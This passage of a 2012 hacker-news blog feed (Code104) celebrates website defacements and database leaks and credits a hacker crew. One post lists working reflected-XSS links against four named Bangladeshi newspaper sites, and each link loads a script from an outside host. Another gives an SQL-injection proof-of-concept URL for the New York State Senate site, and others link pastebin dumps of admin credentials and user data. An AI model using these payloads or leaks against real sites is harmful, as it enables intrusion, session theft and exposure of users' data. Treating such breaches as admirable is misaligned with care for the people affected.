Code104 Team:&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;color: red; font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;u&gt;&lt;span style=&quot;text-align: -webkit-auto; white-space: pre-wrap;&quot;&gt;GoldenBoy,CyberAce,gh0st,PH4N70M C0D3R,&lt;/span&gt;&lt;span style=&quot;text-align: -webkit-auto; white-space: pre-wrap;&quot;&gt;Akfortyseven,Vanish3r,mr.tr0jan,-[D4RK CRYST4L]-&lt;/span&gt;&lt;span style=&quot;text-align: -webkit-auto; white-space: pre-wrap;&quot;&gt;,Evil L0rd,Mysterious,Mauritania Attacker,&lt;/span&gt;&lt;span style=&quot;text-align: -webkit-auto; white-space: pre-wrap;&quot;&gt;Mack aka Mayank,Local r00t,LION HEART,Back End,theCr1m1n4L&lt;/span&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;u&gt;Greetz to: All Indian hackers&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/3179169574262190884/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/04/nirmal-babas-website-hacked-by-league.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/3179169574262190884'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/3179169574262190884'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/04/nirmal-babas-website-hacked-by-league.html' title='Nirmal Baba&#39;s Website Hacked by League of Assassins [Code104]'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFhwT2ILt9UDJHu_9t4PY8ukJgqu3SOiB9KIYjdkkc1iYp5l9QXizM5FrNHKfFA-9b4QhWB5LV_qBFpYBFf9UyNP1n5rhLIy41MqgPYR9-NLpw90EfLNGwAApEUh97la_gLBWfjjjz-1o9/s72-c/104.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-3327141210795254467</id><published>2012-04-06T08:03:00.002-07:00</published><updated>2012-04-06T08:03:17.680-07:00</updated><title type='text'>Bangladeshi NewsPaper Sites Are Vulnerable to XSS</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h4 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;color: #274e13;&quot;&gt;Following bangladeshi newspaper sites are found to vulnerable on testing and admins are reported about this::&lt;/span&gt;&lt;/h4&gt;
&lt;a href=&quot;http://www.bdnews24.com/newslist.php?search=yes&amp;amp;searchtext=%22%3E%3Cscript%20src=http://www.monirulislam.com/xss/xss.js%3E%3C/script%3E&quot; target=&quot;_blank&quot;&gt;BDNEWS24&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.thedailystar.net/newDesign/news-details.php?nid=163826%22%3E%3Cscript%20src=http://www.monirulislam.com/xss/xss.js%3E%3C/script%3E&quot; target=&quot;_blank&quot;&gt;THE DAILY STAR&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.dailykalerkantho.com/?view=details&amp;amp;type=gold&amp;amp;data=Study&amp;amp;pub_no=351%22%3Cscript%20src=http://www.monirulislam.com/xss/xss.js%3E%3C/script%3E&amp;amp;cat_id=1&amp;amp;menu_id=13&amp;amp;news_type_id=1&amp;amp;index=4&quot; target=&quot;_blank&quot;&gt;http://www.dailykalerkantho.com&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.mzamin.com/index.php?option=com_search&amp;amp;Itemid=5&amp;amp;searchword=scr%3Cscript%20src=http://www.monirulislam.com/xss/xss.js%3Eipt%3C/script%3E&amp;amp;submit=%E0%A6%96%E0%A7%87%E0%A6%BE%E0%A6%81%E0%A6%9C+%E0%A6%95%E0%A6%B0&amp;amp;searchphrase=any&amp;amp;ordering=newest&quot; target=&quot;_blank&quot;&gt;http://www.mzamin.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h4 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;color: #274e13;&quot;&gt;Another site vulnerable to blind sqli is :&lt;/span&gt;&lt;/h4&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.islamictv.com.bd/index.php?page=prophet_details&amp;amp;id=1&quot; target=&quot;_blank&quot;&gt;www.islamictv.com.bd&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRb29hrtduqIzNsxI63RDQjk1LX-M2ek_EI2tZL1Cos-DwGxcKiliB368IkLx8HgO8OGWYM3xd3IwHzatmg8UUn2CpGdrldAlKEjoWoUwgoQqwSKzeoXnm72W9p72UAs4Ee2qEXhe26EUH/s1600/D484A82215B241240B107BD624F5D6F2.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRb29hrtduqIzNsxI63RDQjk1LX-M2ek_EI2tZL1Cos-DwGxcKiliB368IkLx8HgO8OGWYM3xd3IwHzatmg8UUn2CpGdrldAlKEjoWoUwgoQqwSKzeoXnm72W9p72UAs4Ee2qEXhe26EUH/s1600/D484A82215B241240B107BD624F5D6F2.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/3327141210795254467/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/04/bangladeshi-newspaper-sites-are.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/3327141210795254467'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/3327141210795254467'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/04/bangladeshi-newspaper-sites-are.html' title='Bangladeshi NewsPaper Sites Are Vulnerable to XSS'/><author><name>clickwatson</name><uri>http://www.blogger.com/profile/07369633173264844061</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='31' height='19' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNTWwxGUIWg7_EbXHGnl4lIhs4bdlsrwNTcuSr6Zzz5fC7QoImhUnCO0RBoLUWmH9tckJJAm53tNv_6-BAZpQwAnxTu6gZDEJaPhckkWt0E5zCDYoys4XRH0cPrUuS_q4/s220/D484A82215B241240B107BD624F5D6F2.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRb29hrtduqIzNsxI63RDQjk1LX-M2ek_EI2tZL1Cos-DwGxcKiliB368IkLx8HgO8OGWYM3xd3IwHzatmg8UUn2CpGdrldAlKEjoWoUwgoQqwSKzeoXnm72W9p72UAs4Ee2qEXhe26EUH/s72-c/D484A82215B241240B107BD624F5D6F2.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-7962522791827837826</id><published>2012-02-07T03:59:00.000-08:00</published><updated>2012-02-07T03:59:22.708-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Defacements"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="Indian Cyber Army"/><category scheme="http://www.blogger.com/atom/ns#" term="Indian Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="IndiShell"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><title type='text'>3 Websites Defaced by Sen Indishell</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgqY-xq-V5ixmphzWjd0f7nHa_lI5DNp3tBvh3TYsVDOBNWzB3mAPmurXbHp_yvIsYOJJ_rxTQFOHaKDtkqG-a5bBanXVnFH_tybxkUBnNLd7Qi_srTmb8_OURgIt0BleTI0lvpBtvtqUj/s1600/sen.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;323&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgqY-xq-V5ixmphzWjd0f7nHa_lI5DNp3tBvh3TYsVDOBNWzB3mAPmurXbHp_yvIsYOJJ_rxTQFOHaKDtkqG-a5bBanXVnFH_tybxkUBnNLd7Qi_srTmb8_OURgIt0BleTI0lvpBtvtqUj/s640/sen.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
3 Website got defaced by Sen from &lt;u&gt;&lt;b&gt;Indishell [Indian Cyber Army].&amp;nbsp; &lt;/b&gt;&lt;/u&gt;After a big span of time a hacker named&amp;nbsp; &quot;SEN&quot; from Indishell hacked some websites. As we know that we are too busy these days so i am posting this news after a long period !&lt;br /&gt;
&lt;br /&gt;
Code104 is busy making some personal Projects!&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Here are the details of this defacement :-&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Website :- &lt;a href=&quot;http://sexawek.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://sexawek.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Mirror :- &lt;a href=&quot;http://legend-h.org/mirror/404283/sexawek.com/xmlrpc.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://legend-h.org/mirror/404283/sexawek.com/xmlrpc.php&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Website :- &lt;a href=&quot;http://latesthacker.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://latesthacker.com/&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Mirror :- &lt;a href=&quot;http://legend-h.org/mirror/403220/latesthacker.com/wp-content/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://legend-h.org/mirror/403220/latesthacker.com/wp-content/&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Website:- &lt;a href=&quot;http://telecomtricks.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://telecomtricks.com/&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Mirror :- &lt;a href=&quot;http://legend-h.org/mirror/403138/telecomtricks.com/wp-content/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://legend-h.org/mirror/403138/telecomtricks.com/wp-content/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Check out more defacements by Indishell here :- &lt;/span&gt;&lt;/b&gt;&lt;a href=&quot;http://code104.blogspot.in/search/label/IndiShell&quot;&gt;http://code104.blogspot.in/search/label/IndiShell&lt;/a&gt;&lt;/blockquote&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/7962522791827837826/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/02/3-websites-defaced-by-sen-indishell.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/7962522791827837826'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/7962522791827837826'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/02/3-websites-defaced-by-sen-indishell.html' title='3 Websites Defaced by Sen Indishell'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgqY-xq-V5ixmphzWjd0f7nHa_lI5DNp3tBvh3TYsVDOBNWzB3mAPmurXbHp_yvIsYOJJ_rxTQFOHaKDtkqG-a5bBanXVnFH_tybxkUBnNLd7Qi_srTmb8_OURgIt0BleTI0lvpBtvtqUj/s72-c/sen.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-3235772676139274570</id><published>2012-01-30T02:03:00.000-08:00</published><updated>2012-01-30T02:03:06.696-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Anonymous Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Defacements"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><title type='text'>Embassy of Kazakhstan hacked by Anonymous Supporters</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYWh6lqfCfTZwqBU_tfAOh2Bm17TIaWt3flB_spnmPjf6xv8S2GzmIB4Lne_cttf-63llpHNVU4msw_f_zzoU_ulqjKOZXJ4wKd3pNmnttUR8RHJQKW2I7ml6OhGWrijLr_eIfpwQ8spCI/s1600/Embassy+of+Kazakhstan+hacked+by+Anonymous+Supporters.png&quot; rel=&quot;follow&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Embassy+of+Kazakhstan+hacked+by+Anonymous+Supporters&quot; border=&quot;0&quot; height=&quot;438&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYWh6lqfCfTZwqBU_tfAOh2Bm17TIaWt3flB_spnmPjf6xv8S2GzmIB4Lne_cttf-63llpHNVU4msw_f_zzoU_ulqjKOZXJ4wKd3pNmnttUR8RHJQKW2I7ml6OhGWrijLr_eIfpwQ8spCI/s640/Embassy+of+Kazakhstan+hacked+by+Anonymous+Supporters.png&quot; title=&quot;Embassy+of+Kazakhstan+hacked+by+Anonymous+Supporters&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;The official website of &lt;a href=&quot;http://www.kazembassy.in/&quot; rel=&quot;follow&quot;&gt;Embassy of Kazakhstan in Delhi&lt;/a&gt; having SQL injection Vulnerability, and Hacker with codename -&amp;nbsp;&lt;b&gt;Abs0luti0n&lt;/b&gt; has&amp;nbsp;successfully Extract the database tables info and leak it on a &lt;a href=&quot;http://pastebin.com/raw.php?i=bwfe7eGf&quot; rel=&quot;follow&quot;&gt;pastebin note&lt;/a&gt;&amp;nbsp;including Admin&#39;s Username and Password.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Hacker said,&quot;&lt;i&gt;&lt;span style=&quot;color: #990000;&quot;&gt;Lately  we have been experimenting on some new large targets which will be  unveiled soon. However today while we were cruising around in our  lulzmobile,we set sights momentarily on another outdated weak vehicle  and with great ease put the pedal to the metal, ran all the lights and  flew straight through our accquired target&lt;/span&gt;&lt;/i&gt;.&quot;&lt;/div&gt;&lt;div id=&quot;aim28216426198086472596&quot;&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;SQL Injection  is a type of web application security vulnerability in which an  attacker is able to submit a database SQL command which is executed by a  web application, exposing the back-end database.&amp;nbsp;Attackers utilize this  vulnerability by providing specially crafted input data to the SQL  interpreter in such a manner that the interpreter is not able to  distinguish between the intended commands and the attacker’s specially  crafted data. The interpreter is tricked into executing unintended  commands.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;SQL injection can be prevented  if you adopt an input validation technique in which user input is  authenticated against a set of defined rules for length, type, and  syntax and also against business rules.&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/3235772676139274570/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/embassy-of-kazakhstan-hacked-by.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/3235772676139274570'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/3235772676139274570'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/embassy-of-kazakhstan-hacked-by.html' title='Embassy of Kazakhstan hacked by Anonymous Supporters'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYWh6lqfCfTZwqBU_tfAOh2Bm17TIaWt3flB_spnmPjf6xv8S2GzmIB4Lne_cttf-63llpHNVU4msw_f_zzoU_ulqjKOZXJ4wKd3pNmnttUR8RHJQKW2I7ml6OhGWrijLr_eIfpwQ8spCI/s72-c/Embassy+of+Kazakhstan+hacked+by+Anonymous+Supporters.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-7106740306668674969</id><published>2012-01-29T06:02:00.000-08:00</published><updated>2012-01-29T06:02:34.060-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="Indian Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Vulnerability"/><title type='text'>SQli Vulnerability found in New York State Senate Official Site</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnJe3l8d8xdWJdaOl4sQmDL6ScduCp2A9NP8x1x87_JEY5MHBhALPaoZ7i7hHsAvw9JNnCAvvYAZDZTGBl_oEsoTLHK2WwsXMRTqyrkgkDzoUi7MG_U8o4nEJWCFJmA-TNujrVoITmeX1X/s1600/newyork.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;225&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnJe3l8d8xdWJdaOl4sQmDL6ScduCp2A9NP8x1x87_JEY5MHBhALPaoZ7i7hHsAvw9JNnCAvvYAZDZTGBl_oEsoTLHK2WwsXMRTqyrkgkDzoUi7MG_U8o4nEJWCFJmA-TNujrVoITmeX1X/s400/newyork.png&quot; width=&quot;400&quot; /&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;Few days ago &lt;u&gt;&lt;b&gt;Sec Indi Security Team&lt;/b&gt;&lt;/u&gt; exposed a Cross-site request forgery (CSRF) vulnerability in wikileaks website. Again they have found SQL-i on the official website of &lt;b&gt;&lt;u&gt;New York State Senate&lt;/u&gt;&lt;/b&gt;. Earlier this group have also detected&amp;nbsp; SQL-i vulnerability on the official website of US Senate, also they have hacked the Admin panel of famous Indian website click India. The vulnerability on the NY State Senate is still UN-patched. According to the hackers group - an attack can easily misuse this security flaws and can gain illegal access on the database of the NY Sate Senate.&amp;nbsp; &lt;/div&gt;&lt;u&gt;&lt;b&gt;Proof Of Concept :- &lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.nysenate.gov/committee/administrative_regulations_review_commission_%28arrc%29/updates/feed?type=%27legislation&quot;&gt;http://www.nysenate.gov/committee/administrative_regulations_review_commission_%28arrc%29/updates/feed?type=%27legislation&lt;/a&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/7106740306668674969/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/sqli-vulnerability-found-in-new-york.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/7106740306668674969'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/7106740306668674969'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/sqli-vulnerability-found-in-new-york.html' title='SQli Vulnerability found in New York State Senate Official Site'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnJe3l8d8xdWJdaOl4sQmDL6ScduCp2A9NP8x1x87_JEY5MHBhALPaoZ7i7hHsAvw9JNnCAvvYAZDZTGBl_oEsoTLHK2WwsXMRTqyrkgkDzoUi7MG_U8o4nEJWCFJmA-TNujrVoITmeX1X/s72-c/newyork.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-6378204556399400224</id><published>2012-01-28T21:50:00.000-08:00</published><updated>2012-01-28T21:50:13.654-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Database Exposed"/><category scheme="http://www.blogger.com/atom/ns#" term="Defacements"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security News"/><title type='text'>Universal Music Portugal Hacked and Database Dumped</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge2RDsFlHGTc6xRXf6F0MJ_f6fIG22TWCHE7kJMB93vpPcaOBUJNvIrdbfklF5jFOhQerbf1D72cVjt4Qn55AZBB9vy0ATYv-0ETx508Nre5UGiFx4enqiO7Phl5YYMhdRi6k1VnQ3QJkN/s1600/universal.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;142&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge2RDsFlHGTc6xRXf6F0MJ_f6fIG22TWCHE7kJMB93vpPcaOBUJNvIrdbfklF5jFOhQerbf1D72cVjt4Qn55AZBB9vy0ATYv-0ETx508Nre5UGiFx4enqiO7Phl5YYMhdRi6k1VnQ3QJkN/s320/universal.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Another Latest Tip come in my Inbox today about the leak of Database of &lt;a href=&quot;http://universalmusic.pt/&quot; rel=&quot;follow&quot;&gt;Universal Music Portugal&lt;/a&gt;&#39;s website. Hacker did not mention his name,or Codename, But he enumerate the Database and Extract it by Hacking the Site.&lt;/div&gt;&lt;div id=&quot;aim25934388289759303071&quot;&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;100&#39;s of Tables from Database and Users Data has been leaked via a &lt;a href=&quot;http://pastebin.com/66vewaYP&quot; rel=&quot;follow&quot;&gt;pastebin File&lt;/a&gt;. It includes the Usernames, Passwords and Emails ID&#39;s of Users of Site.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Immediate after the Hack, The Universal Group taken down the site for&amp;nbsp;maintenance.&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/6378204556399400224/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/universal-music-portugal-hacked-and.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/6378204556399400224'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/6378204556399400224'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/universal-music-portugal-hacked-and.html' title='Universal Music Portugal Hacked and Database Dumped'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" 